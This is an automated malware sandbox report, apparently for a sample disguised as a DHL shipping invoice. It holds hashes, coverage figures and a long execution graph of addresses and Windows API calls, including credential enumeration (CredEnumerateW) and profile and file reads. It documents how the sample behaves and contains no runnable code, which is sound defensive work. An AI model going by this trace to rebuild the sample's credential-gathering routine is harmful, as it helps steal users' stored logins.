                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                                                                      • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                                                                      • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:6.4%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                                      Signature Coverage:3.2%
                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                      Total number of Limit Nodes:85
                                                                                                                                                                                                                                      execution_graph 37589 415321 realloc 37590 415340 37589->37590 37591 41534d 37589->37591 37593 416760 11 API calls 37591->37593 37593->37590 37594 44dea5 37595 44deb5 FreeLibrary 37594->37595 37596 44dec3 37594->37596 37595->37596 37597 4287c1 37598 4287d2 37597->37598 37600 429ac1 37597->37600 37601 428818 37598->37601 37602 42881f 37598->37602 37612 425711 37598->37612 37599 4259da 37660 416760 11 API calls 37599->37660 37630 425ad6 37600->37630 37667 415c56 11 API calls 37600->37667 37634 42013a 37601->37634 37662 420244 97 API calls 37602->37662 37607 4260dd 37661 424251 120 API calls 37607->37661 37608 4259c2 37608->37630 37654 415c56 11 API calls 37608->37654 37612->37599 37612->37600 37612->37608 37615 429a4d 37612->37615 37618 422aeb memset memcpy memcpy 37612->37618 37622 4260a1 37612->37622 37633 425a38 37612->37633 37650 4227f0 memset memcpy 37612->37650 37651 422b84 15 API calls 37612->37651 37652 422b5d memset memcpy memcpy 37612->37652 37653 422640 13 API calls 37612->37653 37655 4241fc 11 API calls 37612->37655 37656 42413a 90 API calls 37612->37656 37616 429a66 37615->37616 37617 429a9b 37615->37617 37663 415c56 11 API calls 37616->37663 37621 429a96 37617->37621 37665 416760 11 API calls 37617->37665 37618->37612 37666 424251 120 API calls 37621->37666 37659 415c56 11 API calls 37622->37659 37623 429a7a 37664 416760 11 API calls 37623->37664 37633->37608 37657 422640 13 API calls 37633->37657 37658 4226e0 12 API calls 37633->37658 37635 42014c 37634->37635 37638 420151 37634->37638 37677 41e466 97 API calls 37635->37677 37637 420162 37637->37612 37638->37637 37639 4201b3 37638->37639 37640 420229 37638->37640 37641 4201b8 37639->37641 37642 4201dc 37639->37642 37640->37637 37643 41fd5e 86 API calls 37640->37643 37668 41fbdb 37641->37668 37642->37637 37646 4201ff 37642->37646 37674 41fc4c 37642->37674 37643->37637 37646->37637 37649 42013a 97 API calls 37646->37649 37649->37637 37650->37612 37651->37612 37652->37612 37653->37612 37654->37599 37655->37612 37656->37612 37657->37633 37658->37633 37659->37599 37660->37607 37661->37630 37662->37612 37663->37623 37664->37621 37665->37621 37666->37600 37667->37599 37669 41fbf8 37668->37669 37672 41fbf1 37668->37672 37682 41ee26 37669->37682 37673 41fc39 37672->37673 37692 4446ce 11 API calls 37672->37692 37673->37637 37678 41fd5e 37673->37678 37675 41ee6b 86 API calls 37674->37675 37676 41fc5d 37675->37676 37676->37642 37677->37638 37680 41fd65 37678->37680 37679 41fdab 37679->37637 37680->37679 37681 41fbdb 86 API calls 37680->37681 37681->37680 37683 41ee41 37682->37683 37684 41ee32 37682->37684 37693 41edad 37683->37693 37696 4446ce 11 API calls 37684->37696 37688 41ee3c 37688->37672 37690 41ee58 37690->37688 37698 41ee6b 37690->37698 37692->37673 37702 41be52 37693->37702 37696->37688 37697 41eb85 11 API calls 37697->37690 37699 41ee70 37698->37699 37700 41ee78 37698->37700 37755 41bf99 86 API calls 37699->37755 37700->37688 37703 41be6f 37702->37703 37704 41be5f 37702->37704 37708 41be8c 37703->37708 37734 418c63 memset memset 37703->37734 37733 4446ce 11 API calls 37704->37733 37706 41be69 37706->37688 37706->37697 37708->37706 37709 41bf3a 37708->37709 37711 41bed1 37708->37711 37721 41bee7 37708->37721 37737 4446ce 11 API calls 37709->37737 37713 41bef0 37711->37713 37716 41bee2 37711->37716 37714 41bf01 37713->37714 37713->37721 37715 41bf24 memset 37714->37715 37717 41bf14 37714->37717 37735 418a6d memset memcpy memset 37714->37735 37715->37706 37723 41ac13 37716->37723 37736 41a223 memset memcpy memset 37717->37736 37721->37706 37738 41a453 86 API calls 37721->37738 37722 41bf20 37722->37715 37724 41ac52 37723->37724 37725 41ac3f memset 37723->37725 37727 41ac6a 37724->37727 37739 41dc14 19 API calls 37724->37739 37729 41acd9 37725->37729 37730 41aca1 37727->37730 37740 41519d 37727->37740 37729->37721 37730->37729 37731 41acc0 memset 37730->37731 37732 41accd memcpy 37730->37732 37731->37729 37732->37729 37733->37706 37734->37708 37735->37717 37736->37722 37737->37721 37739->37727 37743 4175ed 37740->37743 37751 417570 SetFilePointer 37743->37751 37746 41760a ReadFile 37747 417637 37746->37747 37748 417627 GetLastError 37746->37748 37749 4151b3 37747->37749 37750 41763e memset 37747->37750 37748->37749 37749->37730 37750->37749 37752 4175b2 37751->37752 37753 41759c GetLastError 37751->37753 37752->37746 37752->37749 37753->37752 37754 4175a8 GetLastError 37753->37754 37754->37752 37755->37700 37756 417bc5 37757 417c61 37756->37757 37761 417bda 37756->37761 37758 417bf6 UnmapViewOfFile CloseHandle 37758->37758 37758->37761 37760 417c2c 37760->37761 37768 41851e 20 API calls 37760->37768 37761->37757 37761->37758 37761->37760 37763 4175b7 37761->37763 37764 4175d6 CloseHandle 37763->37764 37765 4175c8 37764->37765 37766 4175df 37764->37766 37765->37766 37767 4175ce Sleep 37765->37767 37766->37761 37767->37764 37768->37760 37769 4152c7 malloc 37770 4152ef 37769->37770 37772 4152e2 37769->37772 37773 416760 11 API calls 37770->37773 37773->37772 37774 415308 free 37775 41276d 37776 41277d 37775->37776 37818 4044a4 LoadLibraryW 37776->37818 37778 412785 37810 412789 37778->37810 37826 414b81 37778->37826 37781 4127c8 37832 412465 memset ??2@YAPAXI 37781->37832 37783 4127ea 37844 40ac21 37783->37844 37788 412813 37862 40dd07 memset 37788->37862 37789 412827 37867 40db69 memset 37789->37867 37792 412822 37888 4125b6 ??3@YAXPAX 37792->37888 37794 40ada2 _wcsicmp 37795 41283d 37794->37795 37795->37792 37798 412863 CoInitialize 37795->37798 37872 41268e 37795->37872 37892 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37798->37892 37802 41296f 37894 40b633 37802->37894 37804 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37809 412957 CoUninitialize 37804->37809 37815 4128ca 37804->37815 37809->37792 37811 4128d0 TranslateAcceleratorW 37812 412941 GetMessageW 37811->37812 37811->37815 37812->37809 37812->37811 37813 412909 IsDialogMessageW 37813->37812 37813->37815 37814 4128fd IsDialogMessageW 37814->37812 37814->37813 37815->37811 37815->37813 37815->37814 37816 41292b TranslateMessage DispatchMessageW 37815->37816 37817 41291f IsDialogMessageW 37815->37817 37816->37812 37817->37812 37817->37816 37819 4044f7 37818->37819 37820 4044cf GetProcAddress 37818->37820 37824 404507 MessageBoxW 37819->37824 37825 40451e 37819->37825 37821 4044e8 FreeLibrary 37820->37821 37822 4044df 37820->37822 37821->37819 37823 4044f3 37821->37823 37822->37821 37823->37819 37824->37778 37825->37778 37827 414b8a 37826->37827 37828 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37826->37828 37898 40a804 memset 37827->37898 37828->37781 37831 414b9e GetProcAddress 37831->37828 37833 4124e0 37832->37833 37834 412505 ??2@YAPAXI 37833->37834 37835 41251c 37834->37835 37837 412521 37834->37837 37920 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37835->37920 37909 444722 37837->37909 37843 41259b wcscpy 37843->37783 37925 40b1ab free free 37844->37925 37846 40ac5c 37849 40ad4b 37846->37849 37850 40a9ce malloc memcpy free free 37846->37850 37852 40ace7 free 37846->37852 37857 40ad76 37846->37857 37929 40a8d0 37846->37929 37941 4099f4 37846->37941 37849->37857 37949 40a9ce 37849->37949 37850->37846 37852->37846 37856 40a8d0 7 API calls 37856->37857 37926 40aa04 37857->37926 37858 40ada2 37859 40adc9 37858->37859 37860 40adaa 37858->37860 37859->37788 37859->37789 37860->37859 37861 40adb3 _wcsicmp 37860->37861 37861->37859 37861->37860 37954 40dce0 37862->37954 37864 40dd3a GetModuleHandleW 37959 40dba7 37864->37959 37868 40dce0 3 API calls 37867->37868 37869 40db99 37868->37869 38031 40dae1 37869->38031 38045 402f3a 37872->38045 37874 412766 37874->37792 37874->37798 37875 4126d3 _wcsicmp 37876 4126a8 37875->37876 37876->37874 37876->37875 37878 41270a 37876->37878 38079 4125f8 7 API calls 37876->38079 37878->37874 38048 411ac5 37878->38048 37889 4125da 37888->37889 37890 4125f0 37889->37890 37891 4125e6 DeleteObject 37889->37891 37893 40b1ab free free 37890->37893 37891->37890 37892->37804 37893->37802 37895 40b640 37894->37895 37896 40b639 free 37894->37896 37897 40b1ab free free 37895->37897 37896->37895 37897->37810 37899 40a83b GetSystemDirectoryW 37898->37899 37900 40a84c wcscpy 37898->37900 37899->37900 37905 409719 wcslen 37900->37905 37903 40a881 LoadLibraryW 37904 40a886 37903->37904 37904->37828 37904->37831 37906 409724 37905->37906 37907 409739 wcscat LoadLibraryW 37905->37907 37906->37907 37908 40972c wcscat 37906->37908 37907->37903 37907->37904 37908->37907 37910 444732 37909->37910 37911 444728 DeleteObject 37909->37911 37921 409cc3 37910->37921 37911->37910 37913 412551 37914 4010f9 37913->37914 37915 401130 37914->37915 37916 401134 GetModuleHandleW LoadIconW 37915->37916 37917 401107 wcsncat 37915->37917 37918 40a7be 37916->37918 37917->37915 37919 40a7d2 37918->37919 37919->37843 37919->37919 37920->37837 37924 409bfd memset wcscpy 37921->37924 37923 409cdb CreateFontIndirectW 37923->37913 37924->37923 37925->37846 37927 40aa14 37926->37927 37928 40aa0a free 37926->37928 37927->37858 37928->37927 37930 40a8eb 37929->37930 37931 40a8df wcslen 37929->37931 37932 40a906 free 37930->37932 37933 40a90f 37930->37933 37931->37930 37934 40a919 37932->37934 37935 4099f4 3 API calls 37933->37935 37936 40a932 37934->37936 37937 40a929 free 37934->37937 37935->37934 37938 4099f4 3 API calls 37936->37938 37939 40a93e memcpy 37937->37939 37940 40a93d 37938->37940 37939->37846 37940->37939 37942 409a41 37941->37942 37943 4099fb malloc 37941->37943 37942->37846 37945 409a37 37943->37945 37946 409a1c 37943->37946 37945->37846 37947 409a30 free 37946->37947 37948 409a20 memcpy 37946->37948 37947->37945 37948->37947 37950 40a9e7 37949->37950 37951 40a9dc free 37949->37951 37953 4099f4 3 API calls 37950->37953 37952 40a9f2 37951->37952 37952->37856 37953->37952 37978 409bca GetModuleFileNameW 37954->37978 37956 40dce6 wcsrchr 37957 40dcf5 37956->37957 37958 40dcf9 wcscat 37956->37958 37957->37958 37958->37864 37979 44db70 37959->37979 37963 40dbfd 37982 4447d9 37963->37982 37966 40dc34 wcscpy wcscpy 38008 40d6f5 37966->38008 37967 40dc1f wcscpy 37967->37966 37970 40d6f5 3 API calls 37971 40dc73 37970->37971 37972 40d6f5 3 API calls 37971->37972 37973 40dc89 37972->37973 37974 40d6f5 3 API calls 37973->37974 37975 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37974->37975 38014 40da80 37975->38014 37978->37956 37980 40dbb4 memset memset 37979->37980 37981 409bca GetModuleFileNameW 37980->37981 37981->37963 37984 4447f4 37982->37984 37983 40dc1b 37983->37966 37983->37967 37984->37983 37985 444807 ??2@YAPAXI 37984->37985 37986 44481f 37985->37986 37987 444873 _snwprintf 37986->37987 37988 4448ab wcscpy 37986->37988 38021 44474a 8 API calls 37987->38021 37990 4448bb 37988->37990 38022 44474a 8 API calls 37990->38022 37991 4448a7 37991->37988 37991->37990 37993 4448cd 38023 44474a 8 API calls 37993->38023 37995 4448e2 38024 44474a 8 API calls 37995->38024 37997 4448f7 38025 44474a 8 API calls 37997->38025 37999 44490c 38026 44474a 8 API calls 37999->38026 38001 444921 38027 44474a 8 API calls 38001->38027 38003 444936 38028 44474a 8 API calls 38003->38028 38005 44494b 38029 44474a 8 API calls 38005->38029 38007 444960 ??3@YAXPAX 38007->37983 38009 44db70 38008->38009 38010 40d702 memset GetPrivateProfileStringW 38009->38010 38011 40d752 38010->38011 38012 40d75c WritePrivateProfileStringW 38010->38012 38011->38012 38013 40d758 38011->38013 38012->38013 38013->37970 38015 44db70 38014->38015 38016 40da8d memset 38015->38016 38017 40daac LoadStringW 38016->38017 38018 40dac6 38017->38018 38018->38017 38020 40dade 38018->38020 38030 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38018->38030 38020->37792 38021->37991 38022->37993 38023->37995 38024->37997 38025->37999 38026->38001 38027->38003 38028->38005 38029->38007 38030->38018 38041 409b98 GetFileAttributesW 38031->38041 38033 40daea 38034 40db63 38033->38034 38035 40daef wcscpy wcscpy GetPrivateProfileIntW 38033->38035 38034->37794 38042 40d65d GetPrivateProfileStringW 38035->38042 38037 40db3e 38043 40d65d GetPrivateProfileStringW 38037->38043 38039 40db4f 38044 40d65d GetPrivateProfileStringW 38039->38044 38041->38033 38042->38037 38043->38039 38044->38034 38080 40eaff 38045->38080 38049 411ae2 memset 38048->38049 38050 411b8f 38048->38050 38120 409bca GetModuleFileNameW 38049->38120 38062 411a8b 38050->38062 38052 411b0a wcsrchr 38053 411b22 wcscat 38052->38053 38054 411b1f 38052->38054 38121 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38053->38121 38054->38053 38056 411b67 38122 402afb 38056->38122 38060 411b7f 38178 40ea13 SendMessageW memset SendMessageW 38060->38178 38063 402afb 27 API calls 38062->38063 38064 411ac0 38063->38064 38065 4110dc 38064->38065 38066 41113e 38065->38066 38071 4110f0 38065->38071 38203 40969c LoadCursorW SetCursor 38066->38203 38068 411143 38204 4032b4 38068->38204 38222 444a54 38068->38222 38069 4110f7 _wcsicmp 38069->38071 38070 411157 38072 40ada2 _wcsicmp 38070->38072 38071->38066 38071->38069 38225 410c46 10 API calls 38071->38225 38075 411167 38072->38075 38073 4111af 38075->38073 38076 4111a6 qsort 38075->38076 38076->38073 38079->37876 38081 40eb10 38080->38081 38093 40e8e0 38081->38093 38084 40eb6c memcpy memcpy 38091 40ebb7 38084->38091 38085 40ebf2 ??2@YAPAXI ??2@YAPAXI 38087 40ec2e ??2@YAPAXI 38085->38087 38089 40ec65 38085->38089 38086 40d134 16 API calls 38086->38091 38087->38089 38089->38089 38103 40ea7f 38089->38103 38091->38084 38091->38085 38091->38086 38092 402f49 38092->37876 38094 40e8f2 38093->38094 38095 40e8eb ??3@YAXPAX 38093->38095 38096 40e900 38094->38096 38097 40e8f9 ??3@YAXPAX 38094->38097 38095->38094 38098 40e911 38096->38098 38099 40e90a ??3@YAXPAX 38096->38099 38097->38096 38100 40e931 ??2@YAPAXI ??2@YAPAXI 38098->38100 38101 40e921 ??3@YAXPAX 38098->38101 38102 40e92a ??3@YAXPAX 38098->38102 38099->38098 38100->38084 38101->38102 38102->38100 38104 40aa04 free 38103->38104 38105 40ea88 38104->38105 38106 40aa04 free 38105->38106 38107 40ea90 38106->38107 38108 40aa04 free 38107->38108 38109 40ea98 38108->38109 38110 40aa04 free 38109->38110 38111 40eaa0 38110->38111 38112 40a9ce 4 API calls 38111->38112 38113 40eab3 38112->38113 38114 40a9ce 4 API calls 38113->38114 38115 40eabd 38114->38115 38116 40a9ce 4 API calls 38115->38116 38117 40eac7 38116->38117 38118 40a9ce 4 API calls 38117->38118 38119 40ead1 38118->38119 38119->38092 38120->38052 38121->38056 38179 40b2cc 38122->38179 38124 402b0a 38125 40b2cc 27 API calls 38124->38125 38126 402b23 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402b3a 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402b54 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402b6b 38131->38132 38133 40b2cc 27 API calls 38132->38133 38134 402b82 38133->38134 38135 40b2cc 27 API calls 38134->38135 38136 402b99 38135->38136 38137 40b2cc 27 API calls 38136->38137 38138 402bb0 38137->38138 38139 40b2cc 27 API calls 38138->38139 38140 402bc7 38139->38140 38141 40b2cc 27 API calls 38140->38141 38142 402bde 38141->38142 38143 40b2cc 27 API calls 38142->38143 38144 402bf5 38143->38144 38145 40b2cc 27 API calls 38144->38145 38146 402c0c 38145->38146 38147 40b2cc 27 API calls 38146->38147 38148 402c23 38147->38148 38149 40b2cc 27 API calls 38148->38149 38150 402c3a 38149->38150 38151 40b2cc 27 API calls 38150->38151 38152 402c51 38151->38152 38153 40b2cc 27 API calls 38152->38153 38154 402c68 38153->38154 38155 40b2cc 27 API calls 38154->38155 38156 402c7f 38155->38156 38157 40b2cc 27 API calls 38156->38157 38158 402c99 38157->38158 38159 40b2cc 27 API calls 38158->38159 38160 402cb3 38159->38160 38161 40b2cc 27 API calls 38160->38161 38162 402cd5 38161->38162 38163 40b2cc 27 API calls 38162->38163 38164 402cf0 38163->38164 38165 40b2cc 27 API calls 38164->38165 38166 402d0b 38165->38166 38167 40b2cc 27 API calls 38166->38167 38168 402d26 38167->38168 38169 40b2cc 27 API calls 38168->38169 38170 402d3e 38169->38170 38171 40b2cc 27 API calls 38170->38171 38172 402d59 38171->38172 38173 40b2cc 27 API calls 38172->38173 38174 402d78 38173->38174 38175 40b2cc 27 API calls 38174->38175 38176 402d93 38175->38176 38177 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38176->38177 38177->38060 38178->38050 38182 40b58d 38179->38182 38181 40b2d1 38181->38124 38183 40b5a4 GetModuleHandleW FindResourceW 38182->38183 38184 40b62e 38182->38184 38185 40b5c2 LoadResource 38183->38185 38187 40b5e7 38183->38187 38184->38181 38186 40b5d0 SizeofResource LockResource 38185->38186 38185->38187 38186->38187 38187->38184 38195 40afcf 38187->38195 38189 40b608 memcpy 38198 40b4d3 memcpy 38189->38198 38191 40b61e 38199 40b3c1 18 API calls 38191->38199 38193 40b626 38200 40b04b 38193->38200 38196 40b04b ??3@YAXPAX 38195->38196 38197 40afd7 ??2@YAPAXI 38196->38197 38197->38189 38198->38191 38199->38193 38201 40b051 ??3@YAXPAX 38200->38201 38202 40b05f 38200->38202 38201->38202 38202->38184 38203->38068 38205 4032c4 38204->38205 38206 40b633 free 38205->38206 38207 403316 38206->38207 38226 44553b 38207->38226 38211 403480 38424 40368c 15 API calls 38211->38424 38213 403489 38214 40b633 free 38213->38214 38215 403495 38214->38215 38215->38070 38216 4033a9 memset memcpy 38217 4033ec wcscmp 38216->38217 38218 40333c 38216->38218 38217->38218 38218->38211 38218->38216 38218->38217 38422 4028e7 11 API calls 38218->38422 38423 40f508 6 API calls 38218->38423 38220 403421 _wcsicmp 38220->38218 38223 444a64 FreeLibrary 38222->38223 38224 444a83 38222->38224 38223->38224 38224->38070 38225->38071 38227 445548 38226->38227 38228 445599 38227->38228 38425 40c768 38227->38425 38229 4455a8 memset 38228->38229 38236 4457f2 38228->38236 38509 403988 38229->38509 38244 445854 38236->38244 38611 403e2d memset memset memset memset memset 38236->38611 38237 445672 38520 403fbe memset memset memset memset memset 38237->38520 38238 4458bb memset memset 38242 414c2e 17 API calls 38238->38242 38240 44595e memset memset 38247 414c2e 17 API calls 38240->38247 38241 4455e5 38241->38237 38255 44560f 38241->38255 38248 4458f9 38242->38248 38243 44557a 38282 44558c 38243->38282 38707 4136c0 CoTaskMemFree 38243->38707 38285 4458aa 38244->38285 38634 403c9c memset memset memset memset memset 38244->38634 38246 445a00 memset memset 38657 414c2e 38246->38657 38253 44599c 38247->38253 38254 40b2cc 27 API calls 38248->38254 38250 445823 38291 4087b3 338 API calls 38250->38291 38310 445849 38250->38310 38262 40b2cc 27 API calls 38253->38262 38263 445909 38254->38263 38265 4087b3 338 API calls 38255->38265 38257 445879 38304 4087b3 338 API calls 38257->38304 38324 44589f 38257->38324 38258 445b38 memset memset memset 38267 445bd4 38258->38267 38268 445b98 38258->38268 38269 4459ac 38262->38269 38278 409d1f 6 API calls 38263->38278 38264 445c8b memset memset 38270 414c2e 17 API calls 38264->38270 38279 445621 38265->38279 38266 445585 38708 41366b FreeLibrary 38266->38708 38276 414c2e 17 API calls 38267->38276 38268->38267 38272 445ba2 38268->38272 38280 409d1f 6 API calls 38269->38280 38281 445cc9 38270->38281 38796 4099c6 wcslen 38272->38796 38273 4456b2 38711 40b1ab free free 38273->38711 38274 40b2cc 27 API calls 38284 445a4f 38274->38284 38287 445be2 38276->38287 38277 403335 38421 4452e5 45 API calls 38277->38421 38290 445919 38278->38290 38709 4454bf 20 API calls 38279->38709 38293 4459bc 38280->38293 38294 409d1f 6 API calls 38281->38294 38493 444b06 38282->38493 38673 409d1f wcslen wcslen 38284->38673 38285->38238 38309 44594a 38285->38309 38297 40b2cc 27 API calls 38287->38297 38288 445d3d 38318 40b2cc 27 API calls 38288->38318 38289 445d88 memset memset memset 38292 414c2e 17 API calls 38289->38292 38725 409b98 GetFileAttributesW 38290->38725 38291->38250 38301 445dde 38292->38301 38792 409b98 GetFileAttributesW 38293->38792 38303 445ce1 38294->38303 38295 445bb3 38799 445403 memset 38295->38799 38308 445bf3 38297->38308 38299 445928 38299->38309 38726 40b6ef 38299->38726 38311 40b2cc 27 API calls 38301->38311 38816 409b98 GetFileAttributesW 38303->38816 38304->38257 38306 445680 38306->38273 38543 4087b3 memset 38306->38543 38317 409d1f 6 API calls 38308->38317 38309->38240 38322 4459ed 38309->38322 38723 40b1ab free free 38310->38723 38321 445def 38311->38321 38312 4459cb 38312->38322 38332 40b6ef 253 API calls 38312->38332 38316 40b2cc 27 API calls 38326 445a94 38316->38326 38328 445c07 38317->38328 38329 445d54 _wcsicmp 38318->38329 38320 445665 38710 40b1ab free free 38320->38710 38330 409d1f 6 API calls 38321->38330 38322->38246 38368 445b22 38322->38368 38323 445cf0 38323->38277 38323->38288 38323->38289 38724 40b1ab free free 38324->38724 38325 445389 259 API calls 38333 445bca 38325->38333 38678 40ae18 38326->38678 38327 44566d 38327->38236 38594 413d4c 38327->38594 38336 445389 259 API calls 38328->38336 38337 445d71 38329->38337 38399 445d67 38329->38399 38340 445e03 38330->38340 38332->38322 38333->38264 38333->38323 38342 445c17 38336->38342 38817 445093 23 API calls 38337->38817 38339 44563c 38339->38320 38344 4087b3 338 API calls 38339->38344 38818 409b98 GetFileAttributesW 38340->38818 38341 4456d8 38347 40b2cc 27 API calls 38341->38347 38348 40b2cc 27 API calls 38342->38348 38343 445d83 38343->38277 38344->38339 38346 40b6ef 253 API calls 38346->38277 38352 4456e2 38347->38352 38349 445c23 38348->38349 38354 409d1f 6 API calls 38349->38354 38351 445e12 38358 445e6b 38351->38358 38363 40b2cc 27 API calls 38351->38363 38712 413fa6 _wcsicmp _wcsicmp 38352->38712 38356 445c37 38354->38356 38355 4456eb 38359 4456fd memset memset memset memset 38355->38359 38360 4457ea 38355->38360 38361 445389 259 API calls 38356->38361 38357 445b17 38793 40aebe 38357->38793 38820 445093 23 API calls 38358->38820 38713 409c70 wcscpy wcsrchr 38359->38713 38716 413d29 38360->38716 38367 445c47 38361->38367 38369 445e33 38363->38369 38374 40b2cc 27 API calls 38367->38374 38368->38258 38368->38333 38375 409d1f 6 API calls 38369->38375 38371 445e7e 38376 445f67 38371->38376 38372 445ab2 memset 38377 40b2cc 27 API calls 38372->38377 38379 445c53 38374->38379 38380 445e47 38375->38380 38381 40b2cc 27 API calls 38376->38381 38382 445aa1 38377->38382 38378 409c70 2 API calls 38383 44577e 38378->38383 38384 409d1f 6 API calls 38379->38384 38819 409b98 GetFileAttributesW 38380->38819 38386 445f73 38381->38386 38382->38357 38382->38372 38387 409d1f 6 API calls 38382->38387 38685 40add4 38382->38685 38690 445389 38382->38690 38699 40ae51 38382->38699 38388 409c70 2 API calls 38383->38388 38389 445c67 38384->38389 38391 409d1f 6 API calls 38386->38391 38387->38382 38392 44578d 38388->38392 38393 445389 259 API calls 38389->38393 38390 445e56 38390->38358 38396 445e83 memset 38390->38396 38394 445f87 38391->38394 38392->38360 38398 40b2cc 27 API calls 38392->38398 38393->38333 38823 409b98 GetFileAttributesW 38394->38823 38400 40b2cc 27 API calls 38396->38400 38401 4457a8 38398->38401 38399->38277 38399->38346 38402 445eab 38400->38402 38403 409d1f 6 API calls 38401->38403 38404 409d1f 6 API calls 38402->38404 38405 4457b8 38403->38405 38406 445ebf 38404->38406 38715 409b98 GetFileAttributesW 38405->38715 38408 40ae18 9 API calls 38406->38408 38417 445ef5 38408->38417 38409 4457c7 38409->38360 38411 4087b3 338 API calls 38409->38411 38410 40ae51 9 API calls 38410->38417 38411->38360 38412 445f5c 38414 40aebe FindClose 38412->38414 38413 40add4 2 API calls 38413->38417 38414->38376 38415 40b2cc 27 API calls 38415->38417 38416 409d1f 6 API calls 38416->38417 38417->38410 38417->38412 38417->38413 38417->38415 38417->38416 38419 445f3a 38417->38419 38821 409b98 GetFileAttributesW 38417->38821 38822 445093 23 API calls 38419->38822 38421->38218 38422->38220 38423->38218 38424->38213 38426 40c775 38425->38426 38824 40b1ab free free 38426->38824 38428 40c788 38825 40b1ab free free 38428->38825 38430 40c790 38826 40b1ab free free 38430->38826 38432 40c798 38433 40aa04 free 38432->38433 38434 40c7a0 38433->38434 38827 40c274 memset 38434->38827 38439 40a8ab 9 API calls 38440 40c7c3 38439->38440 38441 40a8ab 9 API calls 38440->38441 38442 40c7d0 38441->38442 38856 40c3c3 38442->38856 38446 40c877 38455 40bdb0 38446->38455 38447 40c86c 38898 4053fe 39 API calls 38447->38898 38453 40c7e5 38453->38446 38453->38447 38454 40c634 50 API calls 38453->38454 38881 40a706 38453->38881 38454->38453 39162 404363 38455->39162 38457 40bf63 39182 40440c 38457->39182 38460 40bdee 38460->38457 38463 40b2cc 27 API calls 38460->38463 38461 40bddf CredEnumerateW 38461->38460 38464 40be02 wcslen 38463->38464 38465 40bf5d LocalFree 38464->38465 38473 40be1e 38464->38473 38465->38457 38466 40be26 wcsncmp 38466->38473 38469 40be7d memset 38470 40bea7 memcpy 38469->38470 38469->38473 38471 40bf11 wcschr 38470->38471 38470->38473 38471->38473 38472 40b2cc 27 API calls 38474 40bef6 _wcsnicmp 38472->38474 38473->38465 38473->38466 38473->38469 38473->38470 38473->38471 38473->38472 38475 40bf43 LocalFree 38473->38475 39185 40bd5d 28 API calls 38473->39185 39186 404423 38473->39186 38474->38471 38474->38473 38475->38473 38476 4135f7 39201 4135e0 38476->39201 38479 40b2cc 27 API calls 38480 41360d 38479->38480 38481 40a804 8 API calls 38480->38481 38482 413613 38481->38482 38483 41361b 38482->38483 38484 41363e 38482->38484 38486 40b273 27 API calls 38483->38486 38485 4135e0 FreeLibrary 38484->38485 38488 413643 38485->38488 38487 413625 GetProcAddress 38486->38487 38487->38484 38489 413648 38487->38489 38488->38243 38490 413658 38489->38490 38491 4135e0 FreeLibrary 38489->38491 38490->38243 38492 413666 38491->38492 38492->38243 39204 4449b9 38493->39204 38496 4449b9 42 API calls 38498 444b4b 38496->38498 38497 444c15 38500 4449b9 42 API calls 38497->38500 38498->38497 39225 444972 GetVersionExW 38498->39225 38501 444c1f 38500->38501 38501->38228 38502 444b99 memcmp 38507 444b8c 38502->38507 38503 444c0b 39229 444a85 42 API calls 38503->39229 38507->38502 38507->38503 39226 444aa5 42 API calls 38507->39226 39227 40a7a0 GetVersionExW 38507->39227 39228 444a85 42 API calls 38507->39228 38510 40399d 38509->38510 39230 403a16 38510->39230 38513 403a12 wcsrchr 38513->38241 38516 4039a3 38517 4039f4 38516->38517 38519 403a09 38516->38519 39241 40a02c CreateFileW 38516->39241 38518 4099c6 2 API calls 38517->38518 38517->38519 38518->38519 39244 40b1ab free free 38519->39244 38521 414c2e 17 API calls 38520->38521 38522 404048 38521->38522 38523 414c2e 17 API calls 38522->38523 38524 404056 38523->38524 38525 409d1f 6 API calls 38524->38525 38526 404073 38525->38526 38527 409d1f 6 API calls 38526->38527 38528 40408e 38527->38528 38529 409d1f 6 API calls 38528->38529 38530 4040a6 38529->38530 38531 403af5 20 API calls 38530->38531 38532 4040ba 38531->38532 38533 403af5 20 API calls 38532->38533 38534 4040cb 38533->38534 39271 40414f memset 38534->39271 38536 404140 39285 40b1ab free free 38536->39285 38538 4040ec memset 38541 4040e0 38538->38541 38539 404148 38539->38306 38540 4099c6 2 API calls 38540->38541 38541->38536 38541->38538 38541->38540 38542 40a8ab 9 API calls 38541->38542 38542->38541 39298 40a6e6 WideCharToMultiByte 38543->39298 38545 4087ed 39299 4095d9 memset 38545->39299 38548 408809 memset memset memset memset memset 38549 40b2cc 27 API calls 38548->38549 38550 4088a1 38549->38550 38551 409d1f 6 API calls 38550->38551 38552 4088b1 38551->38552 38553 40b2cc 27 API calls 38552->38553 38554 4088c0 38553->38554 38555 409d1f 6 API calls 38554->38555 38556 4088d0 38555->38556 38557 40b2cc 27 API calls 38556->38557 38558 4088df 38557->38558 38559 409d1f 6 API calls 38558->38559 38560 4088ef 38559->38560 38561 40b2cc 27 API calls 38560->38561 38562 4088fe 